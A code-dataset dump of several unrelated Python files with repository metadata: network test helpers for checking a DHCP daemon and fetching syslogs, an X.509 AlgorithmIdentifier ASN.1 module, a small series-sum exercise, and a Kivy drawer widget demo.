        line_number = basic_obj.get_file_number_with_regex(connection_obj,
                                                           option, data.dhcp_config_file)
        if line_number > 0:
            basic_obj.delete_line_using_line_number(connection_obj, line_number,
                                                    data.dhcp_config_file)
def verify_dhcpd_service_status(dut, process_id):
    """
    API to verify that the DHCPD daemon is running with the expected config file,
    by checking the 'ps aux' output filtered by the daemon's pid file.
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    :param dut: device handle for the DHCP server
    :param process_id: pid file name, "dhcpd.pid" (IPv4) or "dhcpd6.pid" (IPv6)
    :return: True when the matching '-cf <config>' argument is found, else False
    """
    st.log("Verifying DHCPD for {} ".format(process_id))
    dhcpd_pid = "/run/dhcp-server/{}".format(process_id)
    ps_aux = basic_obj.get_ps_aux(dut, dhcpd_pid, device="server")
    st.log(ps_aux)
    # Map pid file -> the config-file argument the daemon must have been
    # started with.
    if process_id == "dhcpd6.pid":
        config_string = "-cf /etc/dhcp/dhcpd6.conf"
    elif process_id == "dhcpd.pid":
        config_string = "-cf /etc/dhcp/dhcpd.conf"
    else:
        # Previously an unknown process_id left config_string empty, and
        # '"" in ps_aux' verified trivially True. Fail explicitly instead.
        st.log("Unknown process id {} ...".format(process_id))
        return False
    st.log("Verifying the output with {}".format(config_string))
    if config_string not in ps_aux:
        st.log("Required DHCPD service not found ...")
        return False
    return True
def capture_syslogs(dut, destination_path, file_name):
    """
    Download the rotated (/var/log/syslog.1) and current (/var/log/syslog)
    syslog files from the DUT into destination_path.

    :param dut: device handle
    :param file_name: destination file name(s). A list maps one name per
        syslog source in order (rotated first); a single string downloads
        only the first source.
    :param destination_path: local directory to store the files
    :return: True
    """
    file_names = list(file_name) if isinstance(file_name, list) else [file_name]
    syslog_paths = ["/var/log/syslog.1", "/var/log/syslog"]
    # zip stops at the shorter sequence: with a single file name the original
    # code raised IndexError on file_names[1] for the second syslog path.
    for syslog_path, name in zip(syslog_paths, file_names):
        dst_file = "{}/{}".format(destination_path, name)
        st.download_file_from_dut(dut, syslog_path, dst_file)
    return True
| 48.960512 | 180 | 0.637545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13,948 | 0.304037 |
33c6fc7c6a43f33fca1acd3e80bf340a6e154be0 | 2,881 | py | Python | pisces/algid.py | danieljohnlewis/pisces | 7e7ed9c87692c01b591e14db73a3a7047992e91c | [
"MIT"
] | 1 | 2021-02-03T23:05:19.000Z | 2021-02-03T23:05:19.000Z | pisces/algid.py | danieljohnlewis/pisces | 7e7ed9c87692c01b591e14db73a3a7047992e91c | [
"MIT"
] | null | null | null | pisces/algid.py | danieljohnlewis/pisces | 7e7ed9c87692c01b591e14db73a3a7047992e91c | [
"MIT"
] | 1 | 2017-04-05T16:11:11.000Z | 2017-04-05T16:11:11.000Z | """Handle for X.509 AlgorithmIdentifier objects
This module understands a minimal number of OIDS, just enough X.509
stuff needed for PKCS 1 & 7.
"""
import types
from pisces import asn1
# Well-known algorithm OIDs that appear in X.509 AlgorithmIdentifier
# structures, covering the signature and digest algorithms needed here.
oid_dsa = asn1.OID((1, 2, 840, 10040, 4, 1))  # id-dsa
oid_dsa_sha1 = asn1.OID((1, 2, 840, 10040, 4, 3))  # dsa-with-sha1
oid_rsa = asn1.OID((1, 2, 840, 113549, 1, 1, 1))  # rsaEncryption
oid_rsa_md2 = asn1.OID((1, 2, 840, 113549, 1, 1, 2))  # md2WithRSAEncryption
oid_rsa_md5 = asn1.OID((1, 2, 840, 113549, 1, 1, 4))  # md5WithRSAEncryption
oid_md2 = asn1.OID((1, 2, 840, 113549, 2, 2))  # md2 digest
oid_md5 = asn1.OID((1, 2, 840, 113549, 2, 5))  # md5 digest
oid_sha = asn1.OID((1, 3, 14, 3, 2, 26))  # sha-1 digest
class AlgorithmIdentifier(asn1.ASN1Object):
    """the type of the algorithm plus optional parameters

    public read-only attributes: oid, params, name

    AlgorithmIdentifier ::= SEQUENCE {
        algorithm OBJECT IDENTIFIER,
        parameters ANY DEFINED BY algorithm OPTIONAL }

    defined by X.509
    """

    # OID -> human-readable algorithm name for the OIDs this module knows;
    # lookups for unknown OIDs fall back to None (see __init__).
    __dict = {oid_dsa_sha1: 'dsaWithSha1',
              oid_rsa_md2: 'md2withRSAEncryption',
              oid_rsa_md5: 'md5withRSAEncryption',
              oid_rsa: 'rsa',
              oid_dsa: 'dsa',
              oid_sha: 'sha',
              oid_md2: 'md2',
              oid_md5: 'md5',
              }

    def __init__(self, obj=None, params=None):
        """Build from either a parsed ASN.1 Sequence/list or an OID plus params."""
        self.oid = None
        self.params = None
        self.name = None
        if obj and (isinstance(obj, asn1.Sequence)
                    or type(obj) == types.ListType):
            # Decoding path: obj is the parsed SEQUENCE [oid, params].
            self._decode(obj)
        elif obj:
            # Construction path: obj must be the algorithm OID itself.
            assert isinstance(obj, asn1.OID)
            self.oid = obj
            self.params = params
        self.name = self.__dict.get(self.oid, None)

    def _decode(self, obj):
        # The SEQUENCE carries exactly two elements: OID then parameters.
        self.oid, self.params = obj

    def __cmp__(self, other):
        """Compare against another AlgorithmIdentifier, a Sequence, or a plain list."""
        if isinstance(other, AlgorithmIdentifier):
            return cmp((self.oid, self.params), (other.oid, other.params))
        elif isinstance(other, asn1.Sequence):
            return cmp([self.oid, self.params], other.val)
        elif isinstance(other, list):
            # Because python passes by assignment, the val is taken on comparison. Therefore we check for list (as returned by calling .val).
            return cmp([self.oid, self.params], other)
        return -1

    def __repr__(self):
        # Prefer the friendly name when the OID is known, else show the OID.
        if self.params:
            return "<%s: %s>" % (self.name or self.oid, self.params)
        else:
            return "<" + (self.name or repr(self.oid)) + ">"

    def _encode(self, io):
        # DER-encode as SEQUENCE { oid, params }; absent params are written
        # as an explicit ASN.1 NULL.
        contents = [self.oid.encode()]
        if self.params:
            contents.append(self.params.encode())
        else:
            contents.append(asn1.unparseNull())
        io.write(asn1.unparseSequence(contents))
def test():
    """Self-test: round-trip an AlgorithmIdentifier through encode/parse.

    Results are kept in module globals (x, buf, y) so they can be inspected
    interactively after a failure.
    """
    global x, buf, y
    x = AlgorithmIdentifier(oid_rsa_md5, None)
    buf = x.encode()
    y = asn1.parse(buf)
    assert x == y, "pisces.algid: AlgorithmIdentifier encode/decode failed"

if __name__ == "__main__":
    test()
| 31.659341 | 132 | 0.596668 | 2,065 | 0.716765 | 0 | 0 | 0 | 0 | 0 | 0 | 740 | 0.256855 |
33c729c649ab0cb56e1862e14fe0847fbb9b4398 | 230 | py | Python | exercicios/Lista3/Q31.py | AlexandrePeBrito/CursoUdemyPython | 3de58cb30c9f333b32078309847179ff3f9d7e22 | [
"MIT"
] | null | null | null | exercicios/Lista3/Q31.py | AlexandrePeBrito/CursoUdemyPython | 3de58cb30c9f333b32078309847179ff3f9d7e22 | [
"MIT"
] | null | null | null | exercicios/Lista3/Q31.py | AlexandrePeBrito/CursoUdemyPython | 3de58cb30c9f333b32078309847179ff3f9d7e22 | [
"MIT"
] | null | null | null | #Faça um programa que calcule e escreva o valor de S
# S=1/1+3/2+5/3+7/4...99/50
u=1
valores=[]
for c in range(1,100):
if(c%2==1):
valores.append(round(c/u,2))
u+=1
print(valores)
print(f"S = {sum(valores)}")
| 19.166667 | 52 | 0.586957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.437229 |
33c94b4ecccf7fc17e12956a7c221ae80de3cbe0 | 3,138 | py | Python | examples/for_debug.py | gottadiveintopython/kivyx.uix.drawer | a4de9c8ee65892c16278499f1134b93678a5a01b | [
"MIT"
] | null | null | null | examples/for_debug.py | gottadiveintopython/kivyx.uix.drawer | a4de9c8ee65892c16278499f1134b93678a5a01b | [
"MIT"
] | null | null | null | examples/for_debug.py | gottadiveintopython/kivyx.uix.drawer | a4de9c8ee65892c16278499f1134b93678a5a01b | [
"MIT"
] | null | null | null | from kivy.app import runTouchApp
from kivy.properties import StringProperty
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.lang import Builder
from kivyx.uix.drawer import KXDrawer
class Numpad(GridLayout):
    """A 4x4 grid of fixed-size calculator-style buttons, filled in once the
    kv rules for this widget have been applied."""

    # Button captions, laid out row by row.
    _LABELS = '7 8 9 * 4 5 6 / 1 2 3 del 0 + - ent'

    def on_kv_post(self, *args, **kwargs):
        super().on_kv_post(*args, **kwargs)
        for label in self._LABELS.split():
            self.add_widget(Button(
                text=label,
                font_size=24,
                size_hint=(None, None, ),
                size=(50, 50, ),
            ))
class MenuItem(BoxLayout):
    """A labelled checkbox row; its kv rule re-anchors the shared drawer
    whenever the checkbox becomes active."""

    # Anchor name this item represents (set by the code that builds the menu).
    anchor = StringProperty()

    @property
    def drawer(self):
        """The KXDrawer owned by the root widget two parents up."""
        grandparent = self.parent.parent
        return grandparent.ids.drawer
root = Builder.load_string(r'''
<Numpad>:
cols: 4
rows: 4
spacing: 10
padding: 10
size_hint: None, None
size: self.minimum_size
<Separator@Widget>:
size: 1, 1
canvas:
Color:
rgb: 1, 0, 1
Rectangle:
pos: self.pos
size: self.size
<MenuItem>:
CheckBox:
group: 'menuitem'
on_active: root.drawer.anchor = root.anchor
Label:
text: root.anchor
<StencilFloatLayout@StencilView+FloatLayout>:
BoxLayout:
StencilFloatLayout:
# RelativeLayout:
FloatLayout:
size_hint: .9, .9
pos_hint: {'center_x': .5, 'center_y': .5, }
canvas.after:
Color:
rgb: 1, 1, 1,
Line:
dash_offset: 4
dash_length: 2
rectangle: [*self.pos, *self.size, ]
KXDrawer:
id: drawer
anchor: 'tr'
auto_bring_to_front: True
size_hint: None, None
size: numpad.size
disabled: disabled.active
Numpad:
id: numpad
KXDrawer:
anchor: 'rt'
auto_bring_to_front: True
size_hint: None, None
size: 100, 100
Button:
KXDrawer:
anchor: 'bm'
size_hint: None, None
size: 2, 10
Separator:
size_hint_x: None
BoxLayout:
id: menu
size_hint_x: .1
size_hint_min_x: 100
orientation: 'vertical'
spacing: dp(4)
Label:
text: 'disabled'
color: 0, 1, 0, 1
Switch:
id: disabled
active: False
Separator:
size_hint_y: None
Label:
text: 'methods'
color: 0, 1, 0, 1
Button:
text: 'open()'
on_press: drawer.open()
Button:
text: 'close()'
on_press: drawer.close()
Separator:
size_hint_y: None
Label:
text: 'anchor'
color: 0, 1, 0, 1
''')
# Add one radio-style MenuItem per available drawer anchor to the side menu,
# then start the Kivy event loop with the constructed tree.
menu = root.ids.menu
for anchor in KXDrawer.anchor.options:
    menu.add_widget(MenuItem(anchor=anchor))
runTouchApp(root)
| 24.904762 | 66 | 0.500319 | 500 | 0.159337 | 0 | 0 | 76 | 0.024219 | 0 | 0 | 2,251 | 0.717336 |